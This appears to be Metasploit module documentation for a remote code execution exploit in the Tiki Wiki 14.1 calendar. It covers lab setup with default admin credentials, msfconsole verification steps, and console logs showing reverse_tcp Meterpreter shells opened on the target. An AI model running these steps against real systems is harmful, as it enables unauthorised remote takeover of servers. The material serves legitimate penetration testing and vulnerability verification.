## Vulnerable Application

  * Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
  * Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
  * Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

  **Of note, there is some discussion if 14.2 is vuln or not.**

  1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
  2. The linked app Exploit-DB has is 14.2.
  3. Its verified on Exploit-DB.

vs

  1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
  2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem

### Creating A Testing Environment

  1. Create a fresh Ubuntu 16.04 w/ a LAMP install
  2. `apt-get install php-xml`
  3. Normal php install at that point!
  4. After install, login as admin:admin
  5. Go to the Control Panels
  6. Click Features
  7. Enable Calendar under Main feature
  8. Click Apply

#### Permissions

  If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar:

  1. Log in as admin
  2. From the top dropdown select permissions
  3. Check Anonymous near the top
  4. Click Assign

## Verification Steps

  1. Install the software as documented above
  2. Start msfconsole
  3. Do: `use exploit/linux/http/tiki_calendar_exec`
  4. Do: `set rhost 10.10.10.10`
  5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
  6. Do: `set payload php/bind_perl`
  7. Do: `set verbose true`
  8. Do: `check`

```
  [*] Attempting Login
  [+] Login Successful!
  [+] 10.10.10.10:80 The target is vulnerable.
```

  9. Do: `exploit`
  10. You should get a shell

```
  [*] Started reverse TCP handler on 10.10.10.10:4444 
  [*] Attempting Login
  [+] Login Successful!
  [*] Sending malicious calendar view packet
  [*] Sending stage (33721 bytes) 10.10.10.10.190
  [*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
```

## Options

  **PASSWORD**

  Password is set at first login. Default for admin is 'admin'.

## Scenarios

Example running against unauthenticated calendar v14.1

```
  msf > use exploit/linux/http/tiki_calendar_exec
  msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
  rhost => 192.168.2.190
  msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
  targeturi => /t14_1/
  msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
  payload => php/meterpreter/reverse_tcp
  msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
  lhost => 192.168.2.229
  msf exploit(tiki_calendar_exec) > set verbose true
  verbose => true
  msf exploit(tiki_calendar_exec) > set username ''
  username => 
  msf exploit(tiki_calendar_exec) > exploit
  
  [*] Started reverse TCP handler on 192.168.2.229:4444 
  [*] Sending malicious calendar view packet
  [*] Sending stage (33721 bytes) to 192.168.2.190
  [*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
  
  meterpreter > sysinfo
  Computer    : tikiwiki
  OS          : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
  Meterpreter : php/php
  meterpreter > 
```